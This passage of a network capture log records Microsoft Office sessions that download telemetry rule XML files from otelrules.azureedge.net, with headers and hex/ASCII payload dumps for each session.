EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.6	49866	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:59 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:04 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:03 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: e2bfbc9d-f01e-0085-0f03-4888ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123203Z-r1cf579d7788pwqzhC1EWRrpd800000005p0000000002azm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:04 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.6	49867	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:00 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:00 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: 42c4dea6-f01e-0099-6c03-489171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123200Z-r1cf579d778v97q7hC1EWRf95c00000004y0000000003rwc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:00 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.6	49868	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:01 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:01 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:01 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 22946db9-b01e-0021-4e03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123201Z-r1cf579d778t6txphC1EWRsd4400000005sg000000004pe3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:01 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.6	49869	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:01 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:01 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:01 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 9a7d6e1d-d01e-00a1-4e08-4835b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123201Z-r1cf579d7786c2tshC1EWRr1gc000000052g0000000011n4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:01 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.6	49870	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:01 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:01 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:01 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 1dad0878-201e-0071-1606-48ff15000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123201Z-r1cf579d778t6txphC1EWRsd4400000005r0000000006v3x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:01 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.6	49871	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:02 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:02 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 8332b9fd-c01e-0079-1704-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123202Z-r1cf579d77898tqwhC1EWRf9q800000005d0000000003a8b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:02 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.6	49872	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:03 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:03 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: fdf36bd3-a01e-0070-1e03-48573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123203Z-r1cf579d778t6txphC1EWRsd4400000005v00000000030xb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:03 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.6	49873	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:03 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:03 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 84937fda-101e-0034-6744-4996ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123203Z-r1cf579d778z4wflhC1EWRa3h00000000590000000005sm4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:03 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.6	49874	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:03 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:03 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: a7f22c35-701e-001e-6403-48f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123203Z-r1cf579d778x776bhC1EWRdk8000000005d00000000023wm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:03 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.6	49876	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:04 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:04 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:04 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: 62ef0171-501e-000a-5a03-480180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123204Z-r1cf579d77867vg8hC1EWR8knc00000005a0000000000ce0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:04 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.6	49878	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:05 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:05 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 3c0425b1-401e-0047-7c03-488597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123205Z-r1cf579d778kr8xrhC1EWRfkun00000005qg000000005zqq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:05 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.6	49879	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:05 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:05 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 315ad4be-c01e-0014-2a03-48a6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123205Z-r1cf579d7786c2tshC1EWRr1gc0000000520000000001pec x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
